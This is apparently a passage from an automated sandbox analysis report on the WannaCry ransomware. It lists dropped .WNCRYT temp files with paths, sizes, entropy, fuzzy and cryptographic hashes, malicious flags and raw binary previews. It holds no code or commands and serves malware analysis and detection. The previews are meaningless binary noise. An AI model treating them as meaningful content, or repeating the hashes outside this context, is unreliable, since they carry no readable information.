                                                  Preview:.kY..G.<.h5j{..3..3.=.."....E..=.._.O..$H.?. H....Q..W.e[.V...3.&..EQC.9%<.F._VKywjJ.x.@.7~.....S...j>...0.u.I.V.D.g.f.g=D......I.K...7.K.$............}...D.....h..h.....0e.?.-...h..b....F"i.v.o...j w.....W....@j......... D...2..."Z!&.R.8..K}...wYvO.6.._.C.Zt..@j.....u.......a..czD;uxo0..j.(.P......#.-.{.S..3....&...H.....Hr.j..v..<.Cbb...._s..7...|..|/..Od.<-....6Ji..n.)a.7...p.&.,;.D.`.a5.C..q.m..@.:.nY..c.....E.....AFO.....G..|o..;.X..#z.9.0.....q.q.{..,._.....8.r..a.$........%SAn....d;..g7...>wZA!.'..%.V..D...H..c.K^.4..Bj.=.H...f..D......h.!.....4)..4A.=*.&.l...(?,X.+.{.k........?.....A.UE...y.7..t...4..Y....l.i.9f......n._M.n.K..IX..`U..z..y.jx.......f.G.*....}....j...4@...9....9..x.....[.r..)xv........}.5...Z..~._.b............/..Gj.....a..................8..=V...=.N.!Cp..(^H.d...p...l....;LT.u}..F......!...h........z....K..}`.W.....?....g../.y&b.s...6RaU~.Y!.C.yLSGC...,.g .+;.........|Q..N.w...*.....p.6....k..=.RX....6...iE.

                                                  C:\Users\user\AppData\Local\Temp\26.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.805035461004647
                                                  Encrypted:false
                                                  SSDEEP:12:kjw8faCyaIJ/AaD3qXVVJzjBtOVhI+s/HW+aOTcU6WqQxQ5MJ9oIPFNePOrpCOzm:kjmLoq63sVhw5TcNvQFnreWVCOdloh
                                                  MD5:7485113F60BE889E2FDC4C9E9A574067
                                                  SHA1:8452EB15A0E83D51A3145E7197EAB8AD4D0AB153
                                                  SHA-256:B93DFBA4341FE40ADA18AA969743BC51F7C9E6345D54323EABE23E44E5BEA52C
                                                  SHA-512:8AEBD4C62F3E0EF0D51C1CDD58616CFF42648594A80252D194D61EAEC9640DC69C8CA15AAF814C9C0AAD0FAFA94D880E164CF0C06BFB80F32B32C87E448DCABC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:7..w#.AX.=t "t~.5X.....~M.....X.T.....<8.C.?.....G.d.?...W..e....C.s..C......0.`....&/1..'.....x.m..j<U.Ew6,.z...a.J....4. .>.C.N......\S|... G...^..Tg...6....}P.V......T0.* .nvz..]%...4.H..l(..f.5..r.(......BW`.=...z.C.-ojOO....h..0'....\7).TF.(S.x...B7...S3.S....Sc..q.....I.#D..Z8-...Z.g\w.5._.0.p,...T;n.....z......'4V....Sa.`x.W.....wh.#.....i........9/.T.\6.Y......)......a...,...(.*..B..\.\.f+.....`h...|...e.v..,..O........0.k..:^...ked...f.'..3..3..A..~..*J.e1:cU..u.......'...+~KV..I..Xj..6...O..'.."R..k....<.9..D1........QL..]...."....[.9...?.h*......:...>I.:...|.S%....~.#..!.X.|A.K;......|...l.....1./....1~....u.N..Q.o....'.......;.2m....G........X@kd..bi/uI.. ......`.C2.' ..e.a..h.g. .`.8..N.TV~P(......+......Q......\%,.$f.N.L...fj..~F.|5.v....H..(5...P4Dq.@T..O..]..V...........hY.8zTh..-.......8$..P.T..x$..J......a.6..<X....<,.;a.......x.=...V. ^.XY.....q^d....-=......P..OK=..c.I...2.nx.:.<'....-.[..F..JSh.U...,..%7.P.dc.{=..W......

                                                  C:\Users\user\AppData\Local\Temp\27.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.847505072532563
                                                  Encrypted:false
                                                  SSDEEP:24:YLydq3ZLeW39JRkVwwYUct6g0z7HYJdfbUcy90pI6G4Yqh:jK7i1YHt6g0zmRgbWpHp
                                                  MD5:B4A6AF8A7034D7F880B865771AD2DAE1
                                                  SHA1:89FDD8CF2C37AAE6D8E46544FB7CBADEF7D8C4CA
                                                  SHA-256:BBA338AC7025AFD9B4D34DB3AA74635E7EF4A65BB2DABE7D21F9D6CC2C696990
                                                  SHA-512:6D750EC334959FC785297AB22C016B5479EA7B85F82CFC41D019F34187F9928A2591FFE6C758A7BF389F5B565B65452C077F08F0C1B4FA1870569A1B2D2FB5A0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.t7H.....Ft..Bz...qC.....~dz...J.<."R.....Ae...1.$U.q...c...P..Z0....Y&&~..k..[V.+.W...|..........M2.........3k.1..w..5...xe.W]"w...}..z...|.7f..1..Q..t....e..A.......W.s.....@.r/.e...O..9..l.....K...+,.'.r......$.W;?..(.j..j,.q.c.y_....T.O.._.\R.......r.......c.bD3..1.{.....rb...WS.;r..(..Z..7....@......sH.Wlic.....=:s...-..V/.....V...j..E.....7.+..`_.O......8J..@.Q.:h.#?K.......nv...r....IA............a...'..^r.l?+i.w.U..G......J.G3GZf..-.l.c+...7-...j.Ggz.9r.h.+........G.ea..u.t.py.;....'6....R..!JO....I.a..`.eF.+..+e bN.R}..)n.B].N?..+...|/.~..Nr.0...R...2......e....".;...t...'&EK4..p..b.X.[.8:8..6..S|.L.....T.......ee...3j...,.k^.F..s{....S.... F..8...8.P+...W..Y.7?..E...5.(4....7v.f._..0g.mLeFac.Q..}..?P...d.g.Uku(.......kz'.K.^.f....c!g...9..w./.'.hd.!.)....i..{.....P..Xp.~...z%..Yv7z....jf6../.r.D..u..}%9...0d.?....>.z.\..8v.=.S..$...n."........xL.W.`S.E`....5.T............34....]h].~<.O..@.....r.x.[..=.M.g.q..ZB.h...4g^A....6.>

                                                  C:\Users\user\AppData\Local\Temp\28.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.827279835381131
                                                  Encrypted:false
                                                  SSDEEP:24:CSD5ouH3AGSjN79UQV/XgUBPif6V/e4bNZ9KIbr1+imLp:CYH3tM9p/QmPoh4hZPJml
                                                  MD5:ADE09F57ADE0A92EDFE626F98208C440
                                                  SHA1:BA547705FFEEC6B8D176ED8B1D119BD7349E921C
                                                  SHA-256:798E1AEC3C39211C8F2C70547C305C6E10108A7A7C7782612E1C475C92B98D3A
                                                  SHA-512:49A62E9585C2668B0A13040C2E6356CAFA29BDA9F98033766F86134019D1E67001A7465BAABDE433CCB00FE0D86579360B072C38593BC18573E23FFE9D7C36B0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:dm[....3....=...5..@...B..uI.@;H.P.o.j.T..../7..f.,.T...p...!..'._......V.EJ....F;.6o..-....o.0P.....,....F.L....q".[r..t.(<F+g. pd......M......Q.b........4CI....Y....6>....t.$.D.W(*......{9..[..F[..{aj.N!.qo.....}..j.^.m..l.U.,V...N.....Rn3..0.)H*./.w.X.8^..K-.X/.\pT.4.8w.[o..$.B.Bq..D.'6.}.{......_...$..4.....k.R|.....k....4..C.a..h...W.g......H.mB...*.D#.3.c....B..Y.x.'1&..p.|.D. ez&8...^.....~l..M?cj.J4`$....{Y.^6.....Hk(...I.o+.......^..m3...=m....\.......5.]..$..[...ZD.e.~...........cf...:..%H.l..R-....P.Z+.1.g.J..&4Av.&XF!..l.imR.0*.5..2qiG~<..d..ll....f.A..P.0.`.5.q.#..sVd.$. r..z........f.<.....d......4.k.s...*...I....c.;...W.x....j.rV..y.~.L..1.}.z.W2..........4.o.GWo/..w..........F2\9.#r.x..........M=$v.....(..q.b.=D.|8.#E....J.g.-Y<....<..o.a................<....b...4...b\.n..?g/q.Y.r~.G..qC.d.^...zh..S....dv...q..^....v..l.l.|}.p..:o.>!.U..h.B..Y...!.f...F.|....?3i.1.....I.).^.<NO.>.2=k.1.:..v.=.f.)V.2..N..w3Q

                                                  C:\Users\user\AppData\Local\Temp\29.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.813197753571645
                                                  Encrypted:false
                                                  SSDEEP:24:BzB8zp47kWFOTLz3yiVhUQ04AiDqMgvvHJuRU/4DHtsQiGdLdJ:Bd8zp47wTLbyiVuQkiDqMYH8RUwpsGN
                                                  MD5:E7052018C1BE7B7677F78ADE82211F90
                                                  SHA1:09EF9694FFA1F1DDC0F0282BEB99DE007DA1B8A5
                                                  SHA-256:25BFD3CCD1DFF80E4F2A602F5B71E9B173F42791655629179E4C6F842CEC44F5
                                                  SHA-512:ECA28F7D61C5E7FAF470678F987232B9D9548E68C9383203CF2591922D46634AF8187B844B9F0F23A28961EB8E74DBDF65CB2D0ED97FB6DB967507187C4B2EEC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..g...9.gk...I./.Y.....7..w.X ...@DX..H.....%...Pln.....Uq..Rq.....%.i...VxGS..q.~-..I...!...w.;...T+.\.....-.`'J.gO-..d.*|..o...$V.cR.*...l....I.O.vz}..l..ut.4.d...2A..NF..~.2..cw....h..u (./..Y.=..V..cCk.*.DZ...t...',6.T...../...P.a..K......{.@Z.....u....r.d...B;U..C.;.VV.p..~..l..m..._5..RL.Z-l....9t.pr...iz*...#....v..w......]...n....b....._....Jx#........ M..].G#.T.gM.V....P.c.i..3.W.U...k...tW.1...m/=.vN_m.....N....#5O._.uDY..gh%..e|......P.........I...x`.....'x/.t$.%}^.C...j.......(...)..U.1L!$........}.2.]..].C..{.|......"9G"l.(....!.^..Zr..d/a..O.}B..Kg$...v..m.!h*..L....jCm..6.....`......bZ..i.....4....T_../)w..=...a..<....5}..}..=_uE{....2bMz.....$.?LHX@..|.S........g.ubx,.3...Gy.5..<...VC.^.NJ..bu."}.".$....2p.U..s.;..h...|W..../.n... ).i..KfX.pVU.a...:O.......S...E....".7Y..t....f...[".B..w7.j.:. ....i..@...7...7../H.8>...dP.;.9Z.2.....UkY.%5.:.Q>.&268.<......!.Ul.It....d.EM.I..[JN...Wo..G...1..o.&...]{.zr...67U..'9.......j

                                                  C:\Users\user\AppData\Local\Temp\3.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.820916599091204
                                                  Encrypted:false
                                                  SSDEEP:24:5O1kiFV7z2wSVqmn0t/mTaNqj/hQ4xOqXkGeP8dCnXfXsWlfQajL:M1kmiIt/rqjO4xu6CnvlfzjL
                                                  MD5:9269F2A78EA195E3DDAF8439CB6CF218
                                                  SHA1:1F6FD3935FEC71946192D9D03FA1B8304E35D93E
                                                  SHA-256:E17675BA873A3B28FDA9D70183C24C369C1D1FEFE8AD9912B2F0EC0DD8FC4FC0
                                                  SHA-512:947F0B3F62CA1B73B25C24BA5B21651D7EA126EF2621FA33787653BCD97D4D1E2188FE087186BBAA7D84A327B54C2B5F9EFE5D2F1B0BC44C35CC732801212FE4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:+...W.2..D|.GS|..'t.c_.`S.u..Sh..*.. z... ..q....?$.h ./ZmA..^2>Y|.].W)pU$..T..N`..&...,]..E..M1._....q=....^.qv...~.N.......{..Y.D.!...S.,.bv.a.6s........hI.....T\..r..eT..c.).....ZKC......\ #......0.a.S...MH....o .h&........../m.{&t.w.....W..(}Vb.].^.Z..vJ9]........n.@..bO..<..dpV.3[.G.G,..W..A8t.x..y.S....{)..!.G.o)g.F,J.!.ZW.....i[.|..r..2%..R]G.E...k..n$..."H...{.=g..L;aG."83..u3....i."..}.B.|X....T|.`...vH.#.............Y.`A...W. 3n(.;Q.;.O..{8~.|iR....M..y...Dl..#}G.....3.., e..\`PZ"...0:...z.f....`w>..b.n._..~......../..GJb..Qru..v..B2\Pa...^......H[?*.(..V..wXv.d.R.;.~....HLZ.Klp..+(..KY.J.=..V.C....H_...6.......-.`......,..R.`.\.O...../."..9..........L...J..c.-... ..,p.w.5.R...P..j.g=.d..V....c...lH..(...L..f..|o..=..k.|....>....}......wG2....Rd....7*ai`...d!...)v5..n...@.. ..yF.........p.._.`..........F...)K.=...`Q._..Oq...%R+D..V.......H.J....:.U...yo.8.Vw..3.c...P.+3.)F..l.GN..g.%.>c...e...9.j..r.}..'.."...p@.i.V.\.gI.{D

                                                  C:\Users\user\AppData\Local\Temp\30.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6223568
                                                  Entropy (8bit):7.999269544491864
                                                  Encrypted:true
                                                  SSDEEP:98304:rJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyk:t
                                                  MD5:8185E422B95FD15C2E069EE8C92C1914
                                                  SHA1:C5CEADE352DDBC353C49CDF9963DB634A1B6DF51
                                                  SHA-256:E44CE2AE7E255DBDFE9B4CA81DDA46DAF65194414D095A9AD6F79026B4A51307
                                                  SHA-512:5469F0ABB3E13867067190FE33D45FB14A54A08DA206C0D0FCFB0519B8F0CE11AEE31DD945981D6DF9388D3449A487A7D2902A740D53603B894D565651CEC20D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:.....GE....bcg.U.+...".5E].L.,...Q.IvK.#...~.O....L%..}.R.{..U...Cjd...U.?...Q.... K...x..4..U...X...g..2iH...........d.^..G.|..>.V.;3.-B."..w..#....2..y..)...9..|.l..X;"b...\.v.Sp...0.8Ls.a..?s...=#}..s.O.Z,.....>....v..-.......k..B.;....%k...9F.[\.Sc..Jk.@.. ...b,..z...=.U..Y".!..H....aV....o.....~~dBcY..ts|......"..2.Kt./..{...H.../.L........E(^.=..`....>-.mQ*.p...H.*.rs?s..Q.b.\..!...U...`...s.T5..'.H)Xo}.[..u..k...4..^...1@.d~.{C|./.....L....q..}V7}x....4..hnk..*..'.%S..m......e.L.'.'..&......PW...B.\..s.PT)..'...#g7.U...t.)..m+.N.#.cd.2kj" .+.G...-..n...d.w.h.N.i.....RV.K.......X.GG@s..D.y.^.......C..7.3...<].tu=...$).x.......%6FB@o .j......2%X.X...JMP.K...G..r.S....f.0.j.I(.F..S2+.............S.D...........C.0..`..H..p...8....3t`R.tl..."h..U..n...`c..@.1.s.s..v....F^.......\\.N.~6N........Z..w}.S....]A_......Z.8Fq?.:...{...d..A..B.%.;......V.A...U... !.WM!...E........<...X.b.@..L..+kiR..3;?x.#.;....@....;..E.VXt"pi.sW|..KvL.*Y....

                                                  C:\Users\user\AppData\Local\Temp\31.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.76968202850599
                                                  Encrypted:false
                                                  SSDEEP:24:rJma9DfS/rKJMifTHs+plIgi3jDIihV8IdgE:rJLtKzKvTHp53CC3E
                                                  MD5:79E68F1DCC5E07C5FBABAD70553F522C
                                                  SHA1:A0C6FD94C8E0BD670C1B32194DF55C4E7D49A317
                                                  SHA-256:E3AFA68887AB4FC363E29A0B074E8BC8BB6F187CB9243EFD8DACFC8FBF868E9A
                                                  SHA-512:DA71F5EB73AEAAF1295D602CEC68A4C2251ED7AA2FEE02DDDC39CF8BDB4D952E6975A99FF956199F69A1F8A1EB437BE52CDED43D00C437AB2C1AA4676885A5CC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.A...u.8P.C.F.<....wF.{.`...,...~..X&2....Q....7Db.1...|......S.R....T~.q..._h......{..f.....[BE?`~.]H.... wO... .>...M.B.....L..V..H.FV.C.q...n....W:D.......i;.....!.A.........c....%.t.~..0.*.......C....7..W.1#..o.....n...J.=!...63]l.........k..........k..Y......pK..k..I..er.....p..n0?.......h..x.....W....{p......"....A..6KZ...~...~.c..KRI..u..s...%z......2.....x....n.A.q..^.[qY$...{.a..).7!.J{D.<.#lBn...%.c}?........eM..P..Z....o....k....b...Tap..O.._....U.......P^.)2.TI.T.W)....5.81.....c.|.|.].#...Q.j..;A....,*....z`....&%6.......R?C2..)8..n.7.k;|....Z6H.I/.Y.....v...$....*.lx...t.,(.|V.......4...Dw.....+.h.q.2.=k.\.m.=....k{..T~o..........os+..}.0.R.JR=..d`...>..1.aQ.G..N)$.I.Q..d}}..],..).Q....rlne.%......k........F.Vt..w$9..._c.!*.|.f....\...?a.<P*8+q?)....:.VD..s....l..Y.`.rD.?.d[.`....\....%...g..-.L(..V....s...*.#....DC.....e\..<.k.....X.....yK.V.P...|.<*....Sr0g..&....'.O.......U..P..0..I..y.._....=...=..RAZ.i.j.n..G........O.8:

                                                  C:\Users\user\AppData\Local\Temp\32.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.832741916318372
                                                  Encrypted:false
                                                  SSDEEP:24:H43gtwCmQg2DcT31E2iLEbx5/erBbwd0ptGgqXrQQFD:pTmoD+31CLyx5/iBttGl7nJ
                                                  MD5:CFFDDB2A7B723F1893B65F6F49CA33E5
                                                  SHA1:8D6492AE40DDC55F60CE73732001EE37B1E07A73
                                                  SHA-256:653E4D8D5D307651578323A7CBAE9C59A7AE1A76C95D84DB49E32D7B5B8AAE5A
                                                  SHA-512:EC65305B9805634B3C1DE2C0DA4ABBE78CEC1D233653F7D1E554B92C9C0E26D681A0C05CC0CA16B3521A8A3AFCC764BC74DEE73FB58A951651624C698B8F7586
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:'..J.9.G....{....8.._..%.lY..B.....1.....N.&.=....$...g......".M..vH@..[*..0f...Z^|i.}..G..]....A..~8.h.....$'.e...Y...qTy......Q...'F.G..k.....NO<..ka...[p..v....Rg2.*S.3...X.-...j..../......[W.e..;..S|.&U8.........@UR.......`9......+...d#c.~...1v}(...[.G..q:mjv..T.k..,voC4;..u.p....FB.It.C.g.....}....x...Q`0.{...L..5...kw.1...4...(.8.....&.'.sK.......q..R.....aDN;....x.....Fji......2.y1._3Q.}..L.b.V....[....r.O7-...%..oD.'j.g.\...nP...Gn..]..>....@..{"..5....)X\ (.)..n.....m/...wK..6Q..Ph......>..2N..4....".$s..g.."7hS..v....zO:....T|.|..[p}.T2Mv......<].c.ND....*..\..........1y.id.e6m..Z.+%y(..{.F..4...~....Y....4F.s...].s.P..,..ez.z...9..*.2...=OkM/.E........N..5.Ub....&...E....O.........D.%D....P0...=..]5.0|...P.....$...0PC...1...r...D...q.T!R...X.?XE..:.\ t).;P...&..W..ZRV.q....h.....C.RAh.j8#.Ap._..H.....Z .Vy..;L.w.r..YVX...[k.u...u.y$y..q...,..W`..~.A...zT...a.p..,W/....[`+3z..nK/.$..i]Ut.......<9...|...=.bF....T.._..hoG..

                                                  C:\Users\user\AppData\Local\Temp\33.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:OpenPGP Secret Key
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.792760690895553
                                                  Encrypted:false
                                                  SSDEEP:24:Sz/F7EyhEqItP3JXovsgi3KqQIcpe2GglqtmC80i+l3MWYViI8or1:SzJEyh/ItykhP3cpe2Smx0i+Sicr1
                                                  MD5:E30D97EE5934E9889D663FA21BFFFB42
                                                  SHA1:277F5C25B363AFF68D01410EC4D6DEE0B2BAAD2A
                                                  SHA-256:D47167585F8326B885F16C6B61BBB07BD037F8C1FE01F72A3851DE903D1D7433
                                                  SHA-512:3BCD807FBBF0743B95C006236369597EFD159C9FFD3C4D0A4EFA32E6849C2FD592C409906B82D0F75061C03031C3DA89C27F5B51B3D65AB36E724F3C9F39EBC0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..DH93.G...T.w...g..%..>y.....;....R.&cCk....E._k..P....>.z5'#R\.C.......IH.%.s.4.8U.u.H..Hz...z.xWF...TYHrB.d.......F..>.j.#^p..e7.Y.D.;...T.4...c?/.)f...H....l...Y..'....{..%....2....&..U)y.<M.Ul..0.V.t..q.b7V...N.e%..W./xp.^..h"]...`....b..<..k...N.......|.w<.V.;............' tu..4..^1.........).8.`.b...q........{*.K.........o.[.3.H4&.}..!.2/.l.G.M.T.h."(...D].5E.......7.=)JwFZ.SLO..p.......7..N).5.X.M..L.+..Cy/>?.(...e.1..Do..'t97..e...T.....;E.y.B.9.....c~...;...t.l.[.n..$(...)M.!.E..I...j6...E......D.o..x1...C....B....=.8."..y.>7...&9VE1..e..,.....&\....C'.."..D...D..:......C........N.4......{..Es.'.....#x....D.Ud.d&..IYK..Au=.R..A.._.?.+.4..X.`^~?.u.?..9..,..pL.....4:..Lk.U...(U..Gn .>.>r......."......a.k.2.1......Ds1.9.x..s.. ..n...6..yoD..L.B.].i......... .T>.....N.....6.V..n...5....6o.DN.B@.............H4..y..~.(y.U......v.Ug..\..)..nj.r..(....PZ.......^..j....am."..*.yyJ.{..I....X(\?.:i.H'a..(.$}K..`.p(..t....u.bi.BDVr.g"nA..|..~.

                                                  C:\Users\user\AppData\Local\Temp\34.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.824693748645433
                                                  Encrypted:false
                                                  SSDEEP:24:ufJV5Uio6PDRe4nDNMz3VV/OjgTzE6WOTKXceNPJwK57kFxMqD2n5:0JV0cgA2jn2+2hNPSK57k0nn5
                                                  MD5:5C1258FA6EB4A7CA8DEF84613E949FB6
                                                  SHA1:E9866B0512F65915CEF74D86596392291DD34A72
                                                  SHA-256:B717F20424050A12E4F5D8E5D0183AD2AF4C0885E296C434759E156FAEEAA539
                                                  SHA-512:53B384845D566A9EF1435CE8BD77A7AEC65C4133ED5B419D3CB10617AFAE0F992E84C5931E84EDEB86B2316C23B8438989DF0943A345D3FA7040973B3591ADA5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:........F[.h..q2...h....o7;w....d....X.5..c.jG7....1..8+..PF{&.q4.-..B...9....D.A...... ..7x.M..{.a.4T.;"........M/.,q.%..../.......(.X....s.3\..5.0.w.C&..Q....U.F..{...R(...6..o.K.htOb.V.4\-..$.A}{.:;.D{.....H..HC....U]7. {.B.S..x=....#..Q....$;H..6..........I.{69|....5..G.(..#.J......)....^...v.R.J4..bb...c}:7d"\c.f..>.d*.s...v.]..3..K`...y..`M....#...r...o..e.c2.....&........D!.SIw..t|X.?...D......I6P......W.....N.....m.R..y....D.Xm.EO...3\;.8p..../}......c?.<.c...v..i${..........l.kx............(...&...=../.iwi..z=.z..>.........Q. ......P..c...l..n.........fxoy........>..O.S,....)A_.V.Q.......=.m>../^M......@....pa_.XS[.*..d....<.../..Z.3i._.`-w..2.WV.....M.n<.....0..d...2.o..xQ.3..../I!.}.4.(.c..%......`.....x<......2.)..-.....p.....T..w.......)`Z........Z.....SR.....a..3..L.9.t.= .zf...0....h...r...D..f.Z.'[....24.L.&.Hoe...In...aF?....\.#.......pQVe.%...7].h.%..C..}.].-.. .!.M.e......"jtr....w..q.p..C6.}.s......F....Kw_..j.

                                                  C:\Users\user\AppData\Local\Temp\35.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.831720836354265
                                                  Encrypted:false
                                                  SSDEEP:24:ZNqn+lAhDjREqYaTNU3p1vrCzDFMbEBlfLCywV:ZNq+lAh+WNwX+zcUfC
                                                  MD5:55AE23E68D6F22E5FACA6ED02E836423
                                                  SHA1:21B82521502F823F51B2FBB2695D5DD61484EA23
                                                  SHA-256:E384563E3B32DD41292BEE955F21D777A45210D1CFCE7D5FE246BD67ECCC36F5
                                                  SHA-512:63AA5186AEC08D657735ECC743EEF9F68CCAB22E355EB2490958C64FBBCD564622366D0614AA1E1E96CDD943628A12239F75568CAD68C917057CB6C9EBE6469D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:A....u.._3.!,N....g5..F..HU...m....Q.u.t.\U...nXg....w....j..fw:?Y..<'qu..@....H.i.*C...A...........m...2mZ]..4Ce._jX'>).#Cn(..Y....m.{..iBI<Lf.........+...15.p....b........g..c.......2.....f...u.Z..D...|..C....v.....qYU.....B.....2...K_.._u..X+DF....Cm./5.}.).....1F'.}x..U@.ei..w#t.......9....k.qm..*.u3....fz ...J.=c..@.c..j{@}m..p..@.w_.._Y9P.Hv............wy..Z...O..../.gs......y..$..:T...r.....a%2.&..0J.D..{~.E...".B.r....,.1)gy..7.....~.[......./....k.......!.Ju.;..-.h".>..6.W..(i#.4h.....%.Oe..YxW%\..k..7P.o...2....J......|X.rO#....p..0...*.*tF....... ..Im~.([....RQ..".`.L.<.....L...0..o....:.......W...a.rF.+.+..;..B.xa..`...........0....h/....#.>......G..i....fy.pQn.M.........M{.....lh'.`G..,..P...........T.]h..P...7.4>p...[V..&.7W.N.....:.h0.....fe.=E..PS.8%..Lb.0V?blE......A&.G/[.D.{.r.DJ.w.W..Mj....6.......X....S0N......rA.....&.Y.DK.8...7..Q.nnA.Oc.......0.....;b;...P.F =t`...EJ^....f.......m7{.e.</.... }.....b~..p`....$!..0..

                                                  C:\Users\user\AppData\Local\Temp\36.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.796226678192958
                                                  Encrypted:false
                                                  SSDEEP:24:m3CckNTjzTkdc/S31A85mTTxeH8Cfa1dYN9Xqts6k3:m3Cc6HygHrQuE
                                                  MD5:EEB3F078DE2489A8B344014DBF30C577
                                                  SHA1:DE1950E86CD2F10EA52B7D633C58FD7F8EA90DD1
                                                  SHA-256:486B971F8B11006829AECA94D9879322497923968E5BB6FDB521DA241F4DC6A5
                                                  SHA-512:BFDD02F33A2649E57229074152E1C44903D0859E6DC99898FCB325902E2892F82595D67F106C42B22F11CB8EF92E51350574A9D4FBCA978E5A2C402BD0A7DC18
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:4... Y+.._..^..*...D.^:\..n.I.R..1B..r?....]IE.an...z......7..X....|.dT.sR:.....:...+....B:.e.z..&}..4...W.Xd/q...S.`..ZI..#...[....S._OX.X..-ZI..v......c..s..@./......n.z.))gN/.)O...@..!'o.IV....S.}..w.V..#.....p..Uw[.]{....VV..f.a7.X..OY.....|...G...$......t+.S....um+..[..EY..u...s..*.s.*..S..+.jy.}3b.w.6./%..TJ..}...{.s..n..e..!...[1.j.9... ...a!v.._k..}.Q...nU'd.l.I_m..H.w......tU.......;\/3..e...}t.V`~.h..g..*.?K....]9)....u..8]v.g.X.B_v.Aj&E.?.~a..so@T.{......~.v4...-Y.%....Y...*^.e.....W.9...%..3.sc./...!.w..o#.9-G.p3.3..l.CK:.>]O..X.-.......W...e..A.w.d?L...\>...C$+c..;.....r_...*;@.....+..`....6.4.\MM.1........(.3.......r.t.[.......'....~f3.:.x..:.WD...N7.fvv ...c;..=.u......Ls.....{................u.P.q9....$."i=p`.7.p...p.F.5AV..O...p.?....6`.h4...(-.).....("......*@$......1.T.............R.Q.}..a.{..-....I.....6...."*..Y.7..{L....0.$.._...V.Fd....e..S..r..b!d...u...b..@.]t.....Z./.;..kT..VU$.;.tY.\A...[#.!..}.H..r;.&PN2..c.Nh

                                                  C:\Users\user\AppData\Local\Temp\37.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.8068780345827244
                                                  Encrypted:false
                                                  SSDEEP:24:5wI9UP0PdqtSytQ3QLid1u0j8ld5+lh08/t0Ea+X5ucPA/W+6:mCdSSAMUid1u0gld5+bZFBucPYW+6
                                                  MD5:91B16A12E5C2A9061BDDC8BE74720ABE
                                                  SHA1:2FF8B4637DA343CC36CC9E3D8AE65D07B85C423D
                                                  SHA-256:0CD26F9AA88943711EAA14C81EB8C747E6E9881D617DCAFC1CFFE79F1FDBA662
                                                  SHA-512:CF4873FF27B1155A0472D9067DC20F346F111FD7794C3D6A034AE13F1AE25F30243B0EBC8AC80C6C31A5BDFF1A5E5EB0615F083E6039EA6B6307922E42C01433
                                                  Malicious:false
                                                  Reputation:unknown
